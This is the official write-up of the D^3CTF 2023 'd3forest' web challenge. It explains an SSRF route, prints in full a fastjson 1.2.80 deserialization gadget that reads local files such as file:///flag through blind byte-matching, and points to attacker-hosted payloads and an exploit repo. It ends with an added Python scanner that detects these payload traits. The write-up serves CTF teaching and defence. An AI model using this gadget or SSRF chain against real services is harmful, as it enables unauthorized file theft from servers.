Ant x D^3CTF 2023 WEB d3forest Official WP


d3forest official wp

  1. You can find an SSRF vulnerability in the /getOther route, for example:
/getOther?route=http://host:port/
  2. Forest requests automatically deserialize the response data into the desired data type. The default JSON converter used is fastjson, and fastjson version 1.2.80 is vulnerable to a security issue.
  3. So you need to find a gadget (maybe RCE). Here is a gadget that reads files.
[
  {
    "1ue": {
      "@type": "java.lang.Exception",
      "@type": "com.d3ctf.exceptions.ForestRespException"
    }
  },
  {
    "2ue": {
      "@type": "java.lang.Class",
      "val": {
        "@type": "com.alibaba.fastjson.JSONObject",
        {
          "@type": "java.lang.String"
          "@type": "com.d3ctf.exceptions.ForestRespException",
          "response": ""
        }
      }
    }
  },
  {
    "3ue": {
      "@type": "com.dtflys.forest.http.ForestResponse",
      "@type": "com.dtflys.forest.backend.httpclient.response.HttpclientForestResponse",
      "entity": {
        "@type": "org.apache.http.entity.AbstractHttpEntity",
        "@type": "org.apache.http.entity.InputStreamEntity",
        "inStream": {
          "@type": "org.apache.commons.io.input.BOMInputStream",
          "delegate": {
            "@type": "org.apache.commons.io.input.ReaderInputStream",
            "reader": {
              "@type": "jdk.nashorn.api.scripting.URLReader",
              "url": "file:///flag"
            },
            "charsetName": "UTF-8",
            "bufferSize": 1024
          },
          "boms": [
            {
              "@type": "org.apache.commons.io.ByteOrderMark",
              "charsetName": "UTF-8",
              "bytes": [
                ${exp}
              ]
            }
          ]
        }
      }
    }
  },
  {
    "4ue": {
      "$ref": "$[2].3ue.entity.inStream"
    }
  },
  {
    "5ue": {
      "$ref": "$[3].4ue.bOM.bytes"
    }
  },
  {
    "6ue": {
      "@type": "com.dtflys.forest.backend.httpclient.response.HttpclientForestResponse",
      "entity": {
        "@type": "org.apache.http.entity.InputStreamEntity",
        "inStream": {
          "@type": "org.apache.commons.io.input.BOMInputStream",
          "delegate": {
            "@type": "org.apache.commons.io.input.ReaderInputStream",
            "reader": {
              "@type": "org.apache.commons.io.input.CharSequenceReader",
              "charSequence": {
                "@type": "java.lang.String"
                {
                  "$ref": "$[4].5ue"
                }
              },
              "start": 0,
              "end": 0
            },
            "charsetName": "UTF-8",
            "bufferSize": 1024
          },
          "boms": [
            {
              "@type": "org.apache.commons.io.ByteOrderMark",
              "charsetName": "UTF-8",
              "bytes": [
                1
              ]
            }
          ]
        }
      }
    }
  }
]

  4. This gadget echoes different responses depending on whether or not the content of ${exp} is correct, so you can write a script to conduct blind injection. Due to the Java file protocol trick, it is possible to traverse directories and read files.
  5. Thus, replace the content of ${exp} with bytes and attempt your exp. This is my demo (https://github.com/luelueking/My-CTF-Challenges/tree/main/D3CTF-2023/d3forest-exp).
  • Access the root directory files using "file:///" to traverse through them, and visit vps:8002/exp.
  • Transform the bytes to a String.
  • Lastly, use "file:///flag" to get the flag.
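As an added defensive example (not part of the original writeup or the challenge code): a Python scanner that parses a JSON body with duplicate keys preserved and reports the fastjson indicators the gadget above relies on, namely doubled @type keys, $ref pointers, file: URLs and the commons-io/httpclient sink classes. SINK_CLASSES and the trimmed sample payload are my own construction.

```python
import json

# Classes chained by the gadget above to reach the filesystem; any of them
# turning up as an @type value in untrusted JSON is worth an alert.
SINK_CLASSES = {
    "jdk.nashorn.api.scripting.URLReader", "org.apache.commons.io.input.ReaderInputStream",
    "org.apache.commons.io.input.BOMInputStream", "org.apache.http.entity.InputStreamEntity",
}
def scan_fastjson_payload(text):
    """Collect fastjson indicators: @type values, objects with two @type keys
    (the expectClass trick used above), $ref pointers and file: URLs."""
    # object_pairs_hook keeps duplicate keys; plain json.loads would keep only
    # the last "@type" and hide the bypass.
    doc = json.loads(text, object_pairs_hook=lambda pairs: list(pairs))
    report = {"types": [], "double_type_objects": 0,
              "refs": [], "file_urls": [], "sinks": []}
    def walk(node):
        if not isinstance(node, list):
            return
        # With the hook an object is a list of (key, value) tuples; an array is not.
        if node and all(isinstance(p, tuple) and len(p) == 2 for p in node):
            if [k for k, _ in node].count("@type") > 1:
                report["double_type_objects"] += 1
            for key, val in node:
                if key == "@type" and isinstance(val, str):
                    report["types"].append(val)
                    if val in SINK_CLASSES:
                        report["sinks"].append(val)
                elif key == "$ref" and isinstance(val, str):
                    report["refs"].append(val)
                elif isinstance(val, str) and val.startswith("file:"):
                    report["file_urls"].append(val)
                walk(val)
        else:
            for item in node:
                walk(item)
    walk(doc)
    return report

# Constructed sample: a trimmed copy of the 1ue/3ue/4ue elements of the gadget above.
SAMPLE = """[
 {"1ue": {"@type": "java.lang.Exception", "@type": "com.d3ctf.exceptions.ForestRespException"}},
 {"3ue": {"@type": "com.dtflys.forest.http.ForestResponse",
   "@type": "com.dtflys.forest.backend.httpclient.response.HttpclientForestResponse",
   "entity": {"@type": "org.apache.http.entity.InputStreamEntity",
    "inStream": {"@type": "org.apache.commons.io.input.BOMInputStream",
     "delegate": {"@type": "org.apache.commons.io.input.ReaderInputStream",
      "reader": {"@type": "jdk.nashorn.api.scripting.URLReader", "url": "file:///flag"}}}}}},
 {"4ue": {"$ref": "$[1].3ue.entity.inStream"}}
]"""
```

Running the scanner over response bodies fetched through a route like /getOther, before they reach the JSON converter, gives a cheap signal for this class of payload.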